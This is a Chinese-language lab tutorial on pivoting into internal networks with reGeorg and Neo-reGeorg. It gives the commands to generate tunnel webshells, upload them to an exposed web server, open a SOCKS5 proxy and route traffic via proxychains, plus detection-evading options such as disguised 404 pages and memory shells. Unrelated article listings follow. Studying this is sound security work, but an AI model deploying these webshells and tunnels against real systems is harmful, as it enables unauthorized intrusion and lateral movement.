跳板攻击之:reGeorg 代理转发

郑重声明:

本笔记编写目的只用于安全知识提升,并与更多人共享安全知识,切勿使用笔记中的技术进行违法活动,利用笔记中的技术造成的后果与作者本人无关。倡导维护网络安全人人有责,共同维护网络文明和谐。

1 原理

reGeorg 代理转发是将内网服务器端的数据通过 HTTP/HTTPS 隧道转发到本机,实现基于 HTTP 协议的通信。

2 Neo-reGeorg

  • reGeorg 脚本的特征非常明显,容易被杀毒软件查杀,需要做免杀处理。
  • Neo-reGeorg 是一个旨在积极重构 reGeorg 的项目,目的是:
    • 提高 tunnel 连接安全性
    • 提高可用性,避免特征检测
    • 提高传输内容保密性
    • 应对更多的网络环境场景
  • 下载地址:Release Neo-reGeorg v3.8.1 · L-codes/Neo-reGeorg (github.com)

2.1 实验环境

2.2 利用过程

  1. 对外服务器Win10需要有web服务,可使用phpstudy新建一个

  2. 设置密码生成 tunnel.(aspx|ashx|jsp|jspx|php) ,并上传到对外服务器 Win10 WEB服务根目录下,并确保 kali主机可以访问Win10 服务器上的 tunnel.jsp 文件

    # python neoreg.py generate -k acmd

    [+] Mkdir a directory: neoreg_servers
    
    [+] Create neoreg server files:
    
       => neoreg_servers/tunnel.jspx
    
       => neoreg_servers/tunnel_compatibility.jspx
    
       => neoreg_servers/tunnel.aspx
    
       => neoreg_servers/tunnel.ashx
    
       => neoreg_servers/tunnel.jsp
    
       => neoreg_servers/tunnel_compatibility.jsp
    
       => neoreg_servers/tunnel.php
    • -k:密码

  3. 使用 neoreg.py 连接 WEB 服务器,在本地建立 socks5 代理

    # python3 neoreg.py -k acmd -u http://192.168.50.236/tunnel.php

+------------------------------------------------------------------------+
    
  Log Level set to [ERROR]
    
  Starting SOCKS5 server [127.0.0.1:1080]
    
  Tunnel at:
    
    http://192.168.50.236/tunnel.php
    
+------------------------------------------------------------------------+
    • -k:密码,与生成tunnel时的密码要保持一致

  4. 配置 Proxychains

    vim /etc/proxychains4.conf
    
socks5  127.0.0.1 1080

  5. 代理访问内网服务器

2.3 Advanced Usage

  1. 支持生成的服务端,默认直接请求响应指定的页面内容 (如伪装的 404 页面)
$ python neoreg.py generate -k <you_password> --file 404.html --httpcode 404

$ python neoreg.py -k <you_password> -u <server_url> --skip
  1. 如服务端 WEB,需要设置代理才能访问
$ python neoreg.py -k <you_password> -u <server_url> --proxy socks5://10.1.1.1:8080
  1. 如需 Authorization 认证和定制的 Header 或 Cookie
$ python neoreg.py -k <you_password> -u <server_url> -H 'Authorization: cm9vdDppcyB0d2VsdmU=' --cookie "key=value;key2=value2"
  1. 需要分散请求,可上传到多个路径上,如内存马
$ python neoreg.py -k <you_password> -u <url_1> -u <url_2> -u <url_3> ...
  1. 开启内网转发,应对负载均衡
$ python neoreg.py -k <you_password> -u <url> -r <redirect_url>
  1. 使用端口转发功能,非启动 socks5 服务 ( 127.0.0.1:1080 -> ip:port )
$ python neoreg.py -k <you_password> -u <url> -t <ip:port>
  • 更多关于性能和稳定性的参数设置参考 -h 帮助信息
# 生成服务端脚本

$ python neoreg.py generate -h

    usage: neoreg.py [-h] -k KEY [-o DIR] [-f FILE] [-c CODE] [--read-buff Bytes]

                     [--max-read-size KB]

    Generate neoreg webshell

    optional arguments:

      -h, --help            show this help message and exit

      -k KEY, --key KEY     Specify connection key.

      -o DIR, --outdir DIR  Output directory.

      -f FILE, --file FILE  Camouflage html page file

      -c CODE, --httpcode CODE

                            Specify HTTP response code. When using -r, it is

                            recommended to <400. (default: 200)

      --read-buff Bytes     Remote read buffer. (default: 513)

      --max-read-size KB    Remote max read size. (default: 512)

# 连接服务端

$ python neoreg.py -h

    usage: neoreg.py [-h] -u URI [-r URL] [-t IP:PORT] -k KEY [-l IP] [-p PORT]

                     [-s] [-H LINE] [-c LINE] [-x LINE] [--php-connect-timeout S]

                     [--local-dns] [--read-buff KB] [--read-interval MS]

                     [--write-interval MS] [--max-threads N] [--cut-left N]

                     [--cut-right N] [-v]

    Socks server for Neoreg HTTP(s) tunneller. DEBUG MODE: -k

    (debug_all|debug_base64|debug_headers_key|debug_headers_values)

    optional arguments:

      -h, --help            show this help message and exit

      -u URI, --url URI     The url containing the tunnel script

      -r URL, --redirect-url URL

                            Intranet forwarding the designated server (only

                            jsp(x))

      -t IP:PORT, --target IP:PORT

                            Network forwarding Target, After setting this

                            parameter, port forwarding will be enabled

      -k KEY, --key KEY     Specify connection key

      -l IP, --listen-on IP

                            The default listening address.(default: 127.0.0.1)

      -p PORT, --listen-port PORT

                            The default listening port.(default: 1080)

      -s, --skip            Skip usability testing

      -H LINE, --header LINE

                            Pass custom header LINE to server

      -c LINE, --cookie LINE

                            Custom init cookies

      -x LINE, --proxy LINE

                            Proto://host[:port] Use proxy on given port

      --php-connect-timeout S

                            PHP connect timeout.(default: 0.5)

      --local-dns           Use local resolution DNS

      --read-buff KB        Local read buffer, max data to be sent per

                            POST.(default: 7, max: 50)

      --read-interval MS    Read data interval in milliseconds.(default: 300)

      --write-interval MS   Write data interval in milliseconds.(default: 200)

      --max-threads N       Proxy max threads.(default: 1000)

      --cut-left N          Truncate the left side of the response body

      --cut-right N         Truncate the right side of the response body

      --extract EXPR        Manually extract BODY content. (eg: <html><p>REGBODY</p></html> )

      -v                    Increase verbosity level (use -vv or more for greater

                            effect)

2.4 Remind

  • Mac OSX 上运行 neoreg.py 时,高并发请求会出现网络丢包情况,可通过 ulimit -n 2560 修改当前 shell 的 "最大文件打开数"

  • Tomcat5 等 jdk 低版本情况,用 tunnel_compatibility.jsp(x) 即可

3 reGeorg 代理转发

3.1 实验环境

3.2 利用过程

  1. 将脚本文件上传到Win2012服务器中,并确保 evil 主机可以访问Win2012服务器上的 tunnel.jsp 文件

  2. 在 evil 主机上,利用 reGeorgSocksProxy.py 脚本监听本地的 4444 端口,即可建立代理通信。

    python reGeorgSocksProxy.py -u http://192.168.0.21/regeorg/tunnel.aspx -p 4444

  3. 配置 Proxychains

    vim /etc/proxychains4.conf
    
socks5  127.0.0.1 4444

  4. 代理访问 bulldog

跳板攻击之:reGeorg 代理转发的更多相关文章

  1. ssh代理转发

    实验环境 serverA:172.16.2.116 serverB:172.16.2.225 serverC:172.16.2.115 "代理转发"是针对ssh认证过程的一种转发 ...

  2. curl运行json串,代理转发格式

    curl -b 'uin=o0450654733; skey=@tq9xjRvYy' -H "Content-Type: application/json" -X POST -d ...

  3. windows下使用密钥登录Linux及xshell代理转发

    1.密钥登录原理 一般我们使用xshell访问远程主机(Linux主机)时,都是先请管理员给我们开一个账户,即为我们设置一个一个用户名和对应的密码,然后我们就可以使用下面的方式登录到远程主机了: 在这 ...

  4. IIS充当代理转发请求到Kestrel

    接着上篇博文为ASP.NetCore程序启用SSL的code,这篇将介绍如何用IIS充当反向代理的角色转发请求到Kestrel服务器 与ASP.NET不同,ASP.netCore使用的是自托管web服 ...

  5. Nginx代理转发Apache+svn

    1.安装svn和httpd yum install httpd yum install subversion mod_dav_svn 创建仓库目录 mkdir -p /var/www/svn 3.创建 ...

  6. nginx反向代理转发后页面上的js css文件无法加载【原创】

    故障现象:nginx做代理转发后,发现页面上的js css文件无法加载,页面样式乱了. 原因:没有配置静态资源 解决js css文件无法加载无法访问的问题 解决办法: 修改配置文件nginx.conf ...

  7. Docker Kubernetes hostPort 代理转发

    Docker Kubernetes  hostPort 代理转发 hostPort: 1. 类似docker -p 映射宿主级端口到容器. 2. 容器所在的主机暴露端口转发到指定容器中. 3. hos ...

  8. IIS充当反向代理转发请求到Kestrel

    接着上篇博文为ASP.NetCore程序启用SSL的code,这篇将介绍如何用IIS充当反向代理的角色转发请求到Kestrel服务器 介绍 与ASP.NET不同,ASP.netCore使用的是自托管w ...

  9. iis和apache共用80端口,IIS代理转发apache

    为什么共用80端口应该不用多说了,服务器上程序运行环境有很多套,都想抢用80端口,所以就有了共用80端口的解决方案. 网上很多的教程一般都是设置APACHE使用默认80端口,代理转发IIS的网站,II ...

  10. (转)基于live555的流媒体代理转发服务器

    对于并发量并不大而且对性能要求不是很高的流媒体传输模块,live555还是很好的选择,下面说一下我所实现的流媒体代理服务器(目前只能实现对H264单视频的转发)代理转发主要 对于并发量并不大而且对性能 ...

随机推荐

  1. Windows 10 读取bitlocker加密的硬盘出现参数错误怎么解决?

    我为了数据安全,用windows专业版的bitlocker加密了一个固态硬盘SSD做的移动硬盘(u盘同理),在家里电脑(windows10 家庭版)打开的时候出现了参数错误 即使密码输入正确还是这个错 ...

  2. 【课程复习】Java Web、框架及项目简单回顾

    JavaEE Day14 Servlet&HTTP&Request&BeanUtils介绍 Servlet类体系结构,两个子抽象类,需要继承HttpServlet而不是Gene ...

  3. 前端Ui设计常用WEB框架

    目录 一:前端Ui常用框架 1.Bootstrap 2.Font Awesome框架 二.前端其他UI框架 1.Pure 2.bootstrap 3.EasyUI 4.Ant Design 5. La ...

  4. 分享一个自己封装且一直在维护的依赖.net4.5的http异步组包工具类(支持get,post( 表单 ,json, 包含图片等文件的流提交) ,cookie管理,自动跳转,代理IP,https的支持,高并发的配置等等

    1.)Nuget安装: 搜索 ConfigLab.Comp, 安装最新版即可. 2.)组包示例. 2.1)模拟post表单提交并包含普通参数和一个图片文件(基于HttpFileUploadAssist ...

  5. 高并发解决方案orleans实践

    开具一张图,展开来聊天.有从单个服务.consul集群和orleans来展开高并发测试一个小小数据库并发实例. 首先介绍下场景,创建一个order,同时去product表里面减掉一个库存.很简单的业务 ...

  6. CF构造题1600-1800(1)

    D. Same Count One(Polynomial Round 2022 (Div. 1 + Div. 2, Rated, Prizes!)) 题意 给定 \(n\) 个长度为 \(m\) 的 ...

  7. SpringMVC学习笔记 - 第一章 - 工作流程、Bean加载控制、请求与响应(参数接收与内容返回)、RESTful

    [前置内容]Spring 学习笔记全系列传送门: Spring学习笔记 - 第一章 - IoC(控制反转).IoC容器.Bean的实例化与生命周期.DI(依赖注入) Spring学习笔记 - 第二章 ...

  8. VUE Angular通用动态列表组件-亦可为自动轮播组件-01-根据数据量自动纵向滚动,鼠标划入停止滚动

    本文为纵向轮播,横向轮播/动态列表组件请戳---- 代码是angular的,稍微改改就可以放入Vue项目里,差别不大哟 以下代码可以根据实际情况自行调整 父组件html <app-scroll- ...

  9. 都用过@Autowired,但你知道它是怎么实现的吗

    前言 在使用Spring开发的时候,配置的方式主要有两种,一种是xml的方式,另外一种是 java config的方式.在使用的过程中java config,我们难免会与注解进行各种打交道,其中,我们 ...

  10. c++ 跑酷小游戏之用户体验plus

    #undef UNICODE#undef _UNICODE#include <iostream>#include <iomanip>#include <string> ...